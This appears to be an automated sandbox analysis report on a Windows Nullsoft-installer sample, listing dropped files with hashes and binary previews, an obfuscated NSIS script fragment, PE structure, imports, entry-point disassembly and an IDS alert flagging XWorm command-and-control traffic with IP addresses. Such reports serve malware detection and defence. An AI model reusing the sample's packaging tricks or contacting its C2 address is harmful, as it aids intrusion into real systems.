                                                                    Malicious:false
                                                                    Preview:............................................................................................,................................,I..............*..................{.........................................q..............................A.........................................(......X....%..............................................................................................d.B..............................[..............................#.................p..............c............................;.............h.......................7...................................1.....I..................................................a....................................................j...................................................................................................a.......................V.................................{-..........................................[....................................n..................................................|.................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4194304
                                                                    Entropy (8bit):7.999957575310736
                                                                    Encrypted:true
                                                                    SSDEEP:98304:SDcLaUgZLGTVCfjemnYMjgfRQ14dewsjdis7xGC4tIl:SD4aUgZLhj3gZj67xHRl
                                                                    MD5:498A8D2FF2582C3230061DB8C034E542
                                                                    SHA1:FD90A6C047C4545728E60FEA23DDA445618AB56F
                                                                    SHA-256:4FD8B4E320029B4934A877CD932ABACF6A86AABB78DDDB264E7F752C8949A9AB
                                                                    SHA-512:EF9CBD701C76595A6F9B2C04C79C2430227CA6D23B6A6716892CC28C8A8B2FD40A98AF9A46AF0EF824F886D9916D8046221710F7F6AC8F35B2F8A4DD24A86B56
                                                                    Malicious:false
                                                                    Preview:..9.......F.+...t/.....<o.Qme.x.......N;-.6.....M..\:7.I.d@..C...BDvt.v=.x!of.G....R...p.n..].o....,I.B.h".....E..%_v1.#bD.@.].....D....g..-...Bx.l..I...6.........j..p....x*.z02O.k$.'..di......S...j...=..<...A....=.".,=...N!.x.....1..h.T$>..|a u... .q....Y..bjA.......). $.n@..g.....^...D.7...T..ld.v.../2}y.....L.!.}..KDy...g........E.x..j.\.-.:....:....F...2D./.....C....8....Y..s.R.........i..JV..Pv...|..N......x).`.T...`..)..f...]..c* ...W...7V*.U..&...s...{..'..Bn5^0.z@L.~.u..7^..r.#YS.Z..0..i.F...5.......v..L..s..4.BB.8.-.0..n.p.]eCc.m:.G...th..TT.)..6Y......D. C.=....u.H....c..n...oT.s..J-).w....H.|gd)....D.%.Zn^..e...^.6O........#.9......\.....,g...#.R......l`.s]1..D...z...P.).?.H.t....~...\.A...#..X.y..e]@4!....."K(.?:q..;E.....+.........a......~..U..1.l_...c.=l.!<.i.V.....-iD.K.x......$.8.../.~D..^..l........u....7bA"...'..J....\1....W.T.C..4.5|G:.......Se,..>...HK.^..e..'B.ah....@....\.9u..6..Q{4.-...n..CX.T..,o..{.m.+.w.......
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8601
                                                                    Entropy (8bit):1.1545164397538636
                                                                    Encrypted:false
                                                                    SSDEEP:48:zEuB7ok0LmcrzKI9XjvjvGWt/nSz4DP6FIB/IoZt/V:4uBsk0ac1jvqcD6QhV
                                                                    MD5:F4A704DD6599AA965F753CF4AFF41544
                                                                    SHA1:27F6166A11011BF9340B9477D469A5E39B67CF5B
                                                                    SHA-256:689F1C7B21D424488E2F82F5E1CF663D41BE2B8402853953B723F457D91F5C2F
                                                                    SHA-512:F2EC79C777CA0349BA727C2292026C83C3CCB0F84C807431A859DB7196248C95E17DFE13EA081F3020BF12F14001D58824F6EE0AEE770DED6BEB7D94E082C082
                                                                    Malicious:false
                                                                    Preview:...................8..............................$.....................................................>....................'.......................................Y.....................................B........C....X.......................................:.........................................................V.............................................H.....b..............S...........................................................w..........................f..........................................................................................G..............................................P@...................fj........................G..]................................................0......... ..................................................................................................H.......................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):401789
                                                                    Entropy (8bit):7.065739037088379
                                                                    Encrypted:false
                                                                    SSDEEP:6144:VKZHDLgRwDXlRryEnqgwg7MfFR0bs0A5SmatP+jiCn41/OfGmlYc:Vkx1hyE6gyQbLARxjiC4KGy
                                                                    MD5:DE8A813CE4FD2B0CC978241AB06A18EC
                                                                    SHA1:FF3712B5D4D5AD5C5229AF56800710DE26CA2D1E
                                                                    SHA-256:8DFA258211EEB70EB2DAFE04758756BFBCBECE83013EB853CECA71B22928E91D
                                                                    SHA-512:8F06E206F7F58AA9BDC36425589C2AFAFDF42986E1AD1102E5B38A1717CC2E354A1A8564A9A7FCB2DD74E22E214000AF2184C04C2758DA37EAF89C9567BF63AE
                                                                    Malicious:false
                                                                    Preview:..........lll...............ZZZZ........................eee....................................................K.6...... ........=......i...l......<<..c.................8..........t......T..........q....N.......tt........GGGG..............................}}...%........T..XX....^.......7.pp.hhh..............................D..__..........((.....pp.K...&&&&&&&......k.................................yyyyyyy.........E..a......yy.. ..........................d............................................`.n..........V.....VVV.=..555.U.......222...;;.........._.g..................... .......DDDD.......o.......,..............V........1.3......S.........m......(..................k.....L..ww.9....((..............(..y.......PP..............||||||......(.ZZZ..u......m................r....nn..........O.DDD....ttttt.c...................@....[.......ZZZZZZ.D.}........................................<<<......[[[[......ccc..........*..........RR.......yyyy...J..................xx........VVVV...........
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):225561
                                                                    Entropy (8bit):1.2509602063831964
                                                                    Encrypted:false
                                                                    SSDEEP:768:vodpoBR9G/El4UjO+zHLgOWJmrzfhDM2QY2RSbSL8nMzcUqbFuPYVTmTy2MekyEc:W2pzkDkzfhAtNbKANtv4U
                                                                    MD5:6865DE99FA19A6862DF5C404DE274F27
                                                                    SHA1:4EFBD7E416C513C7B2516052EFD42DB502306C35
                                                                    SHA-256:3921ED66814A1199A488E44FDD72C224D4AD9505F3EA9D111E046704B37483B3
                                                                    SHA-512:F46BDCB2A29BA7ECD780C181230E573D3D0D7C55BFC06CAD641FA764F90068AFB6A3F7FC14AF1BA725A168EF212CBA93F6530FE7C0D0EE0C78B5A5B729F41B3D
                                                                    Malicious:false
                                                                    Preview:......................................................."...............+...........).....................................(.....................................................................W.................................. M...............................a.1................r.......................................................................................:..B.............._......U................./........................7.......................................y......................................S...)........................................................n..........(..........x...e......>..............................:........8..................................q.........................................................z..............Y..i............................................2.........f...............................................................................T........................................................v...........5....................................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):155008
                                                                    Entropy (8bit):4.592026808124209
                                                                    Encrypted:false
                                                                    SSDEEP:1536:GvWaiD1khghhBlYPnsfL3qy0IPazqk8R4JIZoyvUv8fUc/SzqJH3G69/BKhoS64z:GcD1kEVqy0IPaQ7ZhjNaIH37/f8
                                                                    MD5:8F6AC9BACA244A9FE17E755F881C8FC5
                                                                    SHA1:8C1B08CE1996A597904283F8BE8FE677ABB592D9
                                                                    SHA-256:200AD6E107078B2C0ED3B29AA5CE0F7E4AE26E80A8AA25AEA2BB487B2F20AE66
                                                                    SHA-512:78B5924ECC3CB0648B5511638AF98EB1E00D8A150CA84F574CAC9DE04F7BD50D95E2A33C981F1F0467EB898D6D9C34978264B178F57B016A106CEC8F82643922
                                                                    Malicious:false
                                                                    Preview:................3............................&&&&.g......................,......)............ZZ.........{{......I.................!!.k.?.....&&.00............PPPP.p..........7.......\...........<<<.9..............``..............%.....................OO........m.6.P........e...............7777.......................?....P..............,........c..l.....V.........Y................GGG.....}......mmm......I..................H..hh..7...7.g.........mmmmmmmm...............II...........o..33.........""".......................CC..........LLL......q......G......>>................................X......\\..cc........ss..................O....O.QQQQ.R...EE........P..........b..V.........................J..............:...................OO...........a...........hh...<<<..................ggg..HHH.........**..........ww....UU..ooo.........99..........v......II..d....u...nn................c..www..OO..... ........................................77.l.......................g.d........K...(..............
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):56731
                                                                    Entropy (8bit):1.2442160585209034
                                                                    Encrypted:false
                                                                    SSDEEP:384:6tYghFWWJicOfl9hdYo9Gvdjh1rjjKlsru8a/3FPzYnaIgapZvHcFe/0C2vqW8IP:NyJicyhlodh1jKlP/3FcRseqD
                                                                    MD5:BCA0C962216D9B512E1FEE1F72EBA35B
                                                                    SHA1:FF228246A15FA291474DF13F96C51A6BBE03FDBE
                                                                    SHA-256:9207608EB008266B5F27EFAF786A1B6D2C4B611F484F62B5FF31D764C0225923
                                                                    SHA-512:848BEBCE00D0968884AC1A54BC220DA34FADAA072F403434741DFC3F9843EB3848864184F1F38DAEB013CE0BFEE1BDC09679E80F2EAB9C8CC67ABA3816E0548A
                                                                    Malicious:false
                                                                    Preview:6.~........................................................E...............................x...............................................-...................}..............................O....k..............................................................X..................................).......Y...7.....................W......................................c...................................................................\....................0....................................4............~.........................................................................................Z...............................................W..............................p................I....R.............................9........................%............................................................."\.....................n......8................................C...............................................................b..............u..........................W.................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):44084
                                                                    Entropy (8bit):1.251987965137089
                                                                    Encrypted:false
                                                                    SSDEEP:384:H5J4r26NPfk3R0omoj53ZOmVFPACwEygLw6:b4igfY3wEy9
                                                                    MD5:8E1ECD1CAD1A69BA46F3589D3EE05FCD
                                                                    SHA1:511FE3218234DFD061C85834E32694D500A2D8CA
                                                                    SHA-256:027B544D8E1F0A9CC480B455943CDB8B7F2E1E6FE64FA4E84C5FB22F58E75534
                                                                    SHA-512:D4E8D21B29799A2FD6AA6B254B0E5F1E212F2CEFF6244D3AE1641F460A88FD39EC32AB04E3787BE6C313ABC85B76A2ECC90FA697C58B9899AEE59B16452D98F7
                                                                    Malicious:false
                                                                    Preview:....................................................................................................................g.....................t...................)...}..............................................................................................................O.f...............................r................................S...U................:........................................2................................................................7........................."....c.........-..........................>.........................j...........h...............................G2......P.......................qd.......................................................................................................................................\........................7.....................O..T;...LK.......j.........................................................Y..........................J...........................................................................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:Targa image data - Map 32 x 10414 x 1 +1
                                                                    Category:dropped
                                                                    Size (bytes):669932
                                                                    Entropy (8bit):5.5314845590929895
                                                                    Encrypted:false
                                                                    SSDEEP:6144:gKk30jClLCugYQs0Om0TmZi6ZYMdCZcZtaW22ibSd4MoX1DXI5nR9mx2KdQJf6mC:ghdCugMm0TWNIJpbIu945c2iAWeO
                                                                    MD5:43AB379A4F5EB535BEEFA8769D0F145C
                                                                    SHA1:B5BEDA93EDAB6D45FC87C74406F28575AE3BA633
                                                                    SHA-256:E35EFD069097EFCED37EB9A320F9D1519558C61B3C6B606E659A28B0432ADF35
                                                                    SHA-512:27B864E0C981CBC385505AB031A5BF245F8DA6588A7762447305A72E8513F904A4509EB104E6A75EB279D364EF853B936405E3B12C6F63082CB2F33D674826A0
                                                                    Malicious:false
                                                                    Preview:............ ..(............ .(...lI..``.... ......Y..HH.... ..T......@@.... .(B...,..00.... ..%..l... .... ............... ............... .h....0...PNG........IHDR.............\r.f.. .IDATx....5.q..<U..v....-..9..EQ"...$/..."..$N$'.....X.. .#....H.......$....!PdY....,.Cz.....s.....}..J......o....>...z.*.J..J..J..J..J..J..J..J..J..J..J..J>..G..../O..j*..............%...0i....4..S.v.nyW....K...\.;....,^.p.rqV5.....Z..e..R.6.P`4..[2.4..).N.TPT8... ...T.EEr..E.n.}..+.............:...|..m.M.y...E.3}....q...#...L.@..#....h.0...E.F(......F".b......iP..I.R.JF.BP.....~.b..h.9...~......+..-&.{...4,V......g.c.y..^v.......'.*...Y..Q.x.Y.4.........Q.m.....WQ.'. .K9.b..D.S.<X.}^.......s.axY...........,W..[@..>...."&..i..>.'}.T.oOV...U...BZ.QL`$....x.U}..U....m0#w...@3..pD..)...X...Jz.s...K...E./.k..t..._...O.-W...*..s^q..6.._r.).?........0$.eS.*2h.R.i....UkGm.5.F..j..0......Oo.3.A..".Z1.IA,bw.d....F.T....."."........O.}.....w.........;$.w...)..)...9.>.....
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):7164
                                                                    Entropy (8bit):5.424736170205588
                                                                    Encrypted:false
                                                                    SSDEEP:192:tVcb8h0g8jt9vETUdc0OcVgW6Bw2uYcJIt:t7unsYKFcVgDzcJw
                                                                    MD5:118AE093FAA03BDC13A832B55CEFB2DE
                                                                    SHA1:022999FA13CBA8ABCF66C5E866C941547E7AEB33
                                                                    SHA-256:4D2145F9211995A99F9828752EF15F9789ADA25B8CEB1EF135CFE9D2ABD5479F
                                                                    SHA-512:07D35E1E7319DC0271D4CD467A3597A36ED27A00CB115381A01DDDE7C316D311B70345DB04BC84E4D660732A4616967AE407812252CFC9E053BC82BD5A406032
                                                                    Malicious:false
                                                                    Preview:!include "MUI2.nsh"..VIAddVersionKey "ProductName" ""..VIAddVersionKey "Comments" ""..VIAddVersionKey "CompanyName" ""..VIAddVersionKey "LegalTrademarks" ""..VIAddVersionKey "LegalCopyright" ""..VIAddVersionKey "FileDescription" ""..VIAddVersionKey "FileVersion" "1.0.0.0"..VIProductVersion "1.0.0.0"....;@@@@@@@@@@@@@@@@@@ DECLARED VAR @@@@@@@@@@@@@@@@@@..Var Carpooldristighedsemanu83..Var udfrdigedesforkarlesl..Var stemmekvgsjapaneserysep..Var Nonviralanthroxanicvejvse..Var morogennemsnitsalderennor..Var kathinatrvlendesminid..Var uidentificerbarh..Var andelsmejerierskge..Var gloseretblondhvernesc..Var stiftamtmandenc..Var affyretristachyou..Var cementalykkeopfat..Var opereredescroce..Var perturbationalh..Var flyttelsopskringmulslet..Var chromatoscopebewailsb..Var snorkeledbryggerkarreness..Var uidentificerbar..;@@@@@@@@@@@@@@@@@@ DECLARED VAR @@@@@@@@@@@@@@@@@@....;!define MUI_ICON icona.ico....SetCompressor BZIP2....; The name of the installer....Name "Desalinates"....; The f
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):213163
                                                                    Entropy (8bit):1.2509035420987697
                                                                    Encrypted:false
                                                                    SSDEEP:768:E6Ak6TqKI8qNenRhDkU13nK/Owzmzj63GMIrCDVOAqiVyycSsOR2D+uFFO8ukH1m:a/TnkUFupj/vM9PV
                                                                    MD5:98B0761197297AB236BC284E2B596C55
                                                                    SHA1:D84B6FCBC7822AC3617AF2E06807F24B6CB09501
                                                                    SHA-256:1B09158404A448B8B8DA21415D6D3FF844658BF441B5A5FB4C651B2B1F5F5809
                                                                    SHA-512:6AB83D66E4E5874688F7A64C133EF3514CE355936CD66895EFE8249E316E2C87195B82FF4E7780180BA3B58C097196AA58736BA6A9365CC36943C6AC8D78A71D
                                                                    Malicious:false
                                                                    Preview:.....................D............................................................................&................................l..................................................................................................s.q....s...........................Z...........................................................................................................................................................................................................................6..............u................/.............................................................................................................................a...............7.............T.................0........................................L........~........................s..........................P..........................................................................................................................*............O.............s..................f....................J...............H
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):380
                                                                    Entropy (8bit):4.150391372844806
                                                                    Encrypted:false
                                                                    SSDEEP:6:jKYlGRpzKVqXB++DC6XBRuN6kgrRmXLY8bOraYKFSX6WlWfHcSTQX97Mm2CXmVyg:mYsDmVqXBpC6XnDk+wXcj5KFSk+X97xE
                                                                    MD5:DCEB38A26FFEAB28D24D304205DD1CFD
                                                                    SHA1:7C3CD56A0E4A2A768D14EA41D88D163C8A3E66DD
                                                                    SHA-256:68F09ACCAE0DF5988DF3AACFFF32C8025F07A266367AD77E1614814B2A05C98F
                                                                    SHA-512:27469F330E5F57D253084536619CAED2F220CC1AAB74B476C175FAA24467301BA0DD1CC52E9F2F15B5052F0CFC397A4C95B7147C7BD6369ECACD7319FF2BCAE5
                                                                    Malicious:false
                                                                    Preview:bulletinernes rallinae tace frdselstavles.tilgangstiden fiskeriinspektionen balder udfoerselstilladelse jaconet besttelsesmagt.leptochlorite ubestridte slatternes saddel nishiki vognmandsforretningers..citronsafters thermocauteries bractless svejshundenes sindet apostates involve.sparringpartners morkin sheller bananivorous pensionistkortets.blackguard trylleslagenes smrsyrens,
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):401789
                                                                    Entropy (8bit):7.065739037088379
                                                                    Encrypted:false
                                                                    SSDEEP:6144:VKZHDLgRwDXlRryEnqgwg7MfFR0bs0A5SmatP+jiCn41/OfGmlYc:Vkx1hyE6gyQbLARxjiC4KGy
                                                                    MD5:DE8A813CE4FD2B0CC978241AB06A18EC
                                                                    SHA1:FF3712B5D4D5AD5C5229AF56800710DE26CA2D1E
                                                                    SHA-256:8DFA258211EEB70EB2DAFE04758756BFBCBECE83013EB853CECA71B22928E91D
                                                                    SHA-512:8F06E206F7F58AA9BDC36425589C2AFAFDF42986E1AD1102E5B38A1717CC2E354A1A8564A9A7FCB2DD74E22E214000AF2184C04C2758DA37EAF89C9567BF63AE
                                                                    Malicious:false
                                                                    Preview:..........lll...............ZZZZ........................eee....................................................K.6...... ........=......i...l......<<..c.................8..........t......T..........q....N.......tt........GGGG..............................}}...%........T..XX....^.......7.pp.hhh..............................D..__..........((.....pp.K...&&&&&&&......k.................................yyyyyyy.........E..a......yy.. ..........................d............................................`.n..........V.....VVV.=..555.U.......222...;;.........._.g..................... .......DDDD.......o.......,..............V........1.3......S.........m......(..................k.....L..ww.9....((..............(..y.......PP..............||||||......(.ZZZ..u......m................r....nn..........O.DDD....ttttt.c...................@....[.......ZZZZZZ.D.}........................................<<<......[[[[......ccc..........*..........RR.......yyyy...J..................xx........VVVV...........
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.979774478767476
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:sgJV11UlDP.exe
                                                                    File size:5'329'718 bytes
                                                                    MD5:f3a3332b13baa50c41644b86efdf0fe4
                                                                    SHA1:f3b91aa55b8dce62cb614e2a43d8e3973b1d47b6
                                                                    SHA256:7fd5435121f2cb4320b1bc49400152ec3fecce7f5ce0acce56f32c327126c970
                                                                    SHA512:46808e4d79d0d1fbe2835456daf31e0de9e8f296b7863f38400eaa03fbf33be450f92df16f9b77ac5bb95aa33a97d484c1c678891c6e13b151f9cb7865c99be7
                                                                    SSDEEP:98304:EH//4Q0gBDcLaUgZLGTVCfjemnYMjgfRQ14dewsjdis7xGC4tIf/Yapu5koUe:0BD4aUgZLhj3gZj67xHRnFpu5kPe
                                                                    TLSH:8A3633A37D14E06CD59513B812139D5BD77E9FA21C252B672290BB0ABE73389BF23D01
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........r.../...............+.......Rich............PE..L......].................b....9.....H2............@
                                                                    Icon Hash:1e175ed66c3c9347
                                                                    Entrypoint:0x403248
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5DF6D4D5 [Mon Dec 16 00:50:29 2019 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:e9c0657252137ac61c1eeeba4c021000
                                                                    Instruction
                                                                    sub esp, 00000184h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+18h], ebx
                                                                    mov dword ptr [esp+10h], 0040A198h
                                                                    mov dword ptr [esp+20h], ebx
                                                                    mov byte ptr [esp+14h], 00000020h
                                                                    call dword ptr [004080A0h]
                                                                    call dword ptr [0040809Ch]
                                                                    and eax, BFFFFFFFh
                                                                    cmp ax, 00000006h
                                                                    mov dword ptr [007A2F4Ch], eax
                                                                    je 00007F2EE8E4A453h
                                                                    push ebx
                                                                    call 00007F2EE8E4D53Bh
                                                                    cmp eax, ebx
                                                                    je 00007F2EE8E4A449h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 00408298h
                                                                    push esi
                                                                    call 00007F2EE8E4D4B7h
                                                                    push esi
                                                                    call dword ptr [00408098h]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], bl
                                                                    jne 00007F2EE8E4A42Dh
                                                                    push 0000000Ah
                                                                    call 00007F2EE8E4D50Fh
                                                                    push 00000008h
                                                                    call 00007F2EE8E4D508h
                                                                    push 00000006h
                                                                    mov dword ptr [007A2F44h], eax
                                                                    call 00007F2EE8E4D4FCh
                                                                    cmp eax, ebx
                                                                    je 00007F2EE8E4A451h
                                                                    push 0000001Eh
                                                                    call eax
                                                                    test eax, eax
                                                                    je 00007F2EE8E4A449h
                                                                    or byte ptr [007A2F4Fh], 00000040h
                                                                    push ebp
                                                                    call dword ptr [00408040h]
                                                                    push ebx
                                                                    call dword ptr [00408284h]
                                                                    mov dword ptr [007A3018h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+38h]
                                                                    push 00000160h
                                                                    push eax
                                                                    push ebx
                                                                    push 0079E508h
                                                                    call dword ptr [00408178h]
                                                                    push 0040A188h
                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84300xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b60000x3ad78.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x60d80x6200e59663060e65803bb6474d2af98f8aa9False0.6750637755102041data6.467400856752681IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x80000x123e0x14007969015d02b2f673463f43156b28cdb4False0.428515625data5.032652926909017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xa0000x3990580x4002d383339e780dfc9691f30584bbd0766unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x3a40000x120000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x3b60000x3ad780x3ae00a32d901976697d7bbce42d8596684b1dFalse0.6666625199044586data6.294242973261698IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x3b63880x128aePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9988545095457538
                                                                    RT_ICON0x3c8c380x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.4953714657518041
                                                                    RT_ICON0x3d94600x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5109049821315955
                                                                    RT_ICON0x3e29080x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5138170055452865
                                                                    RT_ICON0x3e7d900x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5477680680207841
                                                                    RT_ICON0x3ebfb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5617219917012448
                                                                    RT_ICON0x3ee5600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6238273921200751
                                                                    RT_ICON0x3ef6080x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6639344262295082
                                                                    RT_ICON0x3eff900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7296099290780141
                                                                    RT_DIALOG0x3f03f80x144dataEnglishUnited States0.5216049382716049
                                                                    RT_DIALOG0x3f05400x100dataEnglishUnited States0.5234375
                                                                    RT_DIALOG0x3f06400x11cdataEnglishUnited States0.6056338028169014
                                                                    RT_DIALOG0x3f07600x60dataEnglishUnited States0.7291666666666666
                                                                    RT_GROUP_ICON0x3f07c00x84Targa image data - Map 32 x 10414 x 1 +1EnglishUnited States0.7348484848484849
                                                                    RT_VERSION0x3f08480x1f0MS Windows COFF PowerPC object fileEnglishUnited States0.4959677419354839
                                                                    RT_MANIFEST0x3f0a380x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                    DLLImport
                                                                    KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                    USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                                    GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-10-15T17:45:25.554637+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.858092TCP
